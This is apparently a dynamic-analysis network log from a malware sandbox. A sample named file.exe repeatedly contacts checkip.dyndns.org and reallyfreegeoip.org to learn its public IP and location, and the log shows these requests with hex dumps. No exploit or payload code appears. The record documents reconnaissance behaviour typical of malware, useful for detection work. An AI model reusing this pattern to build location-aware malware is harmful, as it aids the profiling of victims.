User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Dec 31, 2024 09:15:17.298800945 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Dec 31, 2024 09:15:17.303647041 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Dec 31, 2024 09:15:17.930998087 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Dec 31, 2024 09:15:19.010143042 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Dec 31, 2024 09:15:19.010385990 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Dec 31, 2024 09:15:19.010497093 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Dec 31, 2024 09:15:19.910636902 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Dec 31, 2024 09:15:21.648451090 CET273INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:21 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49750
Destination IP: 193.122.6.168
Destination Port: 80
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: Dec 31, 2024 09:15:22.249711037 CET | Bytes transferred: 127 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Timestamp: Dec 31, 2024 09:15:24.145787954 CET | Bytes transferred: 273 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 2
Source IP: 192.168.2.4
Source Port: 49752
Destination IP: 193.122.6.168
Destination Port: 80
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: Dec 31, 2024 09:15:24.749233961 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Dec 31, 2024 09:15:26.876363993 CET | Bytes transferred: 273 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49754
Destination IP: 193.122.6.168
Destination Port: 80
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: Dec 31, 2024 09:15:27.492362976 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Dec 31, 2024 09:15:28.344259977 CET | Bytes transferred: 273 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 4
Source IP: 192.168.2.4
Source Port: 49756
Destination IP: 193.122.6.168
Destination Port: 80
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: Dec 31, 2024 09:15:28.956366062 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Dec 31, 2024 09:15:29.597047091 CET | Bytes transferred: 273 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:29 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5
Source IP: 192.168.2.4
Source Port: 49758
Destination IP: 193.122.6.168
Destination Port: 80
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: Dec 31, 2024 09:15:30.237850904 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Dec 31, 2024 09:15:31.332470894 CET | Bytes transferred: 273 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6
Source IP: 192.168.2.4
Source Port: 49760
Destination IP: 193.122.6.168
Destination Port: 80
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: Dec 31, 2024 09:15:31.956620932 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Dec 31, 2024 09:15:33.092670918 CET | Bytes transferred: 273 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:33 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7
Source IP: 192.168.2.4
Source Port: 49762
Destination IP: 193.122.6.168
Destination Port: 80
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: Dec 31, 2024 09:15:33.734471083 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Dec 31, 2024 09:15:35.361457109 CET | Bytes transferred: 273 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 0
Source IP: 192.168.2.4
Source Port: 49748
Destination IP: 188.114.96.34
Destination Port: 443
PID: 7692
Process: C:\Users\user\Desktop\file.exe

Timestamp: 2024-12-31 08:15:19 UTC | Bytes transferred: 85 | Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Timestamp: 2024-12-31 08:15:19 UTC | Bytes transferred: 852 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:19 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 947708
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCGwsg4TwYGl2uhDgTXvFc6f279AUSnT7%2BeTJkkGfeVhL0xiBxXHyXzR3OQLcGJkEBqv2wkZCCBlV5LKdH9GSnrufTUmUIRzv4GPMqEFtTAv13ibsdlLVc9%2BcDC0GBUW6SnOUn2u"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa8d234ca69de98-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1612&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1724748&cwnd=212&unsent_bytes=0&cid=ab2f1d9ed68c2a3a&ts=404&x=0"

Timestamp: 2024-12-31 08:15:19 UTC | Bytes transferred: 362 | Direction: IN
Data:
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49749 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:22 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-31 08:15:22 UTC | 858 | IN | HTTP/1.1 200 OK
    Date: Tue, 31 Dec 2024 08:15:22 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 947711
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mdutkp9zyRhBt7azPC0GhQ1AeGdqL%2B9Q0gGwyc%2FB8CEHI%2BCiSDPuUuoRoZhaIcVZ6TcrhJcO3sKcSjl4DHa9wOO44Zu5xoiPI%2Bf1q3hhDH%2FZAWdxDNXMJRbXzOgpJGFOa9TOiJ0K"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa8d243ac0cc335-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1481&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1880231&cwnd=165&unsent_bytes=0&cid=a4c340736b328d0c&ts=137&x=0"
2024-12-31 08:15:22 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49751 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:24 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-31 08:15:24 UTC | 858 | IN | HTTP/1.1 200 OK
    Date: Tue, 31 Dec 2024 08:15:24 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 947713
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KojpzFBs2UBz7e2KQk2FbqYkSgH9HK86bveW%2FnbyCmcKkr%2Bn7AUwXmwTwo76fM2GaiuOMAe8bGmi9PnJbLUsK5uLBuGcQFOI3ooswf3fk0Sk2fl2m7z%2Bkk%2BCLtmEvsP0BZXhLt%2B5"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa8d2534bdf4379-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2047&rtt_var=776&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1403846&cwnd=194&unsent_bytes=0&cid=bcb786a768cfe9bb&ts=136&x=0"
2024-12-31 08:15:24 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49753 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:27 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-31 08:15:27 UTC | 852 | IN | HTTP/1.1 200 OK
    Date: Tue, 31 Dec 2024 08:15:27 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 947716
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nj8oY4j1O4fDGnJlJOpnRgfpdLJTJq2Xl0YU5e4leuFh8qcrQtzDzGtdl6H%2FplKItlk7%2F3MktRAcLuPyqMHxeXquUFyO1UhDrKI20wZqJCqAtwlvyga9E1CtJHjAof1k4vbOY5La"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa8d264690cc44a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1606&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1737061&cwnd=228&unsent_bytes=0&cid=0a5d6bd44ba3216f&ts=154&x=0"
2024-12-31 08:15:27 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:28 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-31 08:15:28 UTC | 852 | IN | HTTP/1.1 200 OK
    Date: Tue, 31 Dec 2024 08:15:28 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 947718
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hWxOHsI4VkLW2cKkzNsUJ56FhKoJRfNk6x%2FYN2kBwOCpIYxOJPug9aMQpFG3zjh7w0wS8nB1PR8gMxrVLxLkMJ%2FnKGb42UV9hmatbBUiqeEQkrkFRVkWwMJ8kSvMoVXjR7AE2DEh"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa8d26d88810f8f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1613&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=232&unsent_bytes=0&cid=3a69907d4f7ab80c&ts=142&x=0"
